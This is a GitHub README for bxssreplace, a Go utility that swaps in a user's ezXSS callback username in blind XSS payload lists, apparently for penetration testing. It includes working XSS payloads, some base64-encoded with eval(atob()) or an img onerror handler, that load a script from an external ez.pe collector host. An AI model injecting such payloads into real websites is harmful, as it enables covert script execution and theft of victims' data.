Skip to content
/ bxssreplace Public

A specialized Go tool for replacing blind XSS usernames in payloads, specifically designed for use with the ezXSS service.

1 star 0 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

rix4uni/bxssreplace

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

1 Commit
banner
banner
 
 
.gitattributes
.gitattributes
 
 
README.md
README.md
 
 
bxssreplace.go
bxssreplace.go
 
 
go.mod
go.mod
 
 
go.sum
go.sum
 
 

Repository files navigation

bxssreplace

A specialized Go tool for replacing blind XSS usernames in payloads, specifically designed for use with the ezXSS service.

About ezXSS

This tool is specifically designed to work with ezXSS, an easy and powerful XSS scanning and management service.

After creating an account on ezXSS, you'll receive a unique username for your blind XSS payloads. This tool helps you replace the example username (rix4uni) in payload templates with your actual ezXSS username.

Features

  • 🔍 Smart Base64 Detection: Automatically detects and processes base64-encoded strings in various contexts
  • 🎯 ezXSS Specific: Optimized for ezXSS payload formats and patterns
  • 🔄 Multi-Encoding Support: Handles standard, URL, padded, and raw base64 encodings
  • 📝 Plain Text Replacement: Also replaces non-encoded username occurrences
  • 🚀 Stream Processing: Efficiently processes large payload files via stdin/stdout
  • 🛠 Easy Integration: Simple command-line interface that works with pipes

Getting Your ezXSS Username

  1. Sign up at ezxss.com
  2. Log into your dashboard
  3. Your unique username will be displayed (e.g., abc123def456)
  4. Use this username with the tool to customize your payloads

Installation

go install github.com/rix4uni/bxssreplace@latest

Download prebuilt binaries

wget https://github.com/rix4uni/bxssreplace/releases/download/v0.0.1/bxssreplace-linux-amd64-0.0.1.tgz
tar -xvzf bxssreplace-linux-amd64-0.0.1.tgz
rm -rf bxssreplace-linux-amd64-0.0.1.tgz
mv bxssreplace ~/go/bin/bxssreplace

Or download binary release for your platform.

Compile from source

git clone --depth 1 https://github.com/rix4uni/bxssreplace.git
cd bxssreplace; go install

Usage

Usage of bxssreplace:
  -u, --username string   Username to replace 'rix4uni' with (required)
      --silent            Silent mode.
      --version           Print the version of the tool and exit.

Command Line Options

Option Short Description Required
--username -u Your ezXSS username Yes

Usage Examples

Basic Usage

cat payloads.txt | bxssreplace --username YOUR_EZXSS_USERNAME

Replace username in payload file:

cat xss-payloads.txt | bxssreplace -u myezxssuser > customized-payloads.txt

Process single payload:

echo '<script src="https://rix4uni.ez.pe"></script>' | bxssreplace -u your_username

Download and process payloads directly from GitHub:

curl -s "https://raw.githubusercontent.com/rix4uni/WordList/refs/heads/main/payloads/xss/favourite.txt" | bxssreplace --username myezxssuser

How It Works

The tool performs several types of replacements:

1. Plain Text Replacement

<!-- Input -->
<script src="https://rix4uni.ez.pe"></script>

<!-- Output -->
<script src="https://yourusername.ez.pe"></script>

2. Base64-Encoded Replacement

<!-- Input -->
<math href="javascript:eval(atob('dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vcml4NHVuaS5lei5wZSI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs='))"></math>

<!-- Process -->
Decodes: var a=document.createElement("script");a.src="https://rix4uni.ez.pe";document.body.appendChild(a);
Replaces: rix4uni → yourusername
Re-encodes and outputs updated payload

3. HTML Attribute Replacement

<!-- Input -->
<img src=x id=dmFyIGE9ZG9jdW1lbnQuY3JlYXRlRWxlbWVudCgic2NyaXB0Iik7YS5zcmM9Imh0dHBzOi8vcml4NHVuaS5lei5wZSI7ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChhKTs= onerror=eval(atob(this.id))>

<!-- Output (with decoded and replaced base64) -->

Supported Base64 Contexts

The tool detects base64 strings in various patterns:

  • atob('base64string') and eval(atob('base64string'))
  • btoa() encoded strings
  • Data URIs: data:image/png;base64,base64string
  • HTML attributes: id="base64string", value="base64string"
  • Standalone base64 strings that decode to text containing the username

Example Workflow

# 1. Get your ezXSS username from the dashboard
#    Example: myezxssuser123

# 2. Download and customize payloads directly
curl -s "https://raw.githubusercontent.com/rix4uni/WordList/refs/heads/main/payloads/xss/favourite.txt" | bxssreplace -u myezxssuser123 > my-payloads.txt

# 3. Use the customized payloads in your testing

Limitations

  • Only replaces the username rix4uni (the default example username for ezXSS)
  • Designed specifically for ezXSS service patterns
  • May not handle all possible encoding scenarios
  • Requires valid base64 encoding for encoded replacements

Contributing

Contributions are welcome! Please feel free to submit pull requests or open issues for:

  • Additional base64 detection patterns
  • Support for other blind XSS services
  • Performance improvements
  • Bug fixes

About

A specialized Go tool for replacing blind XSS usernames in payloads, specifically designed for use with the ezXSS service.

Resources

Readme
Activity

Stars

1 star

Watchers

0 watching

Forks

0 forks
Report repository

Releases 1

v0.0.1 Latest
Nov 26, 2025

Packages

No packages published

Languages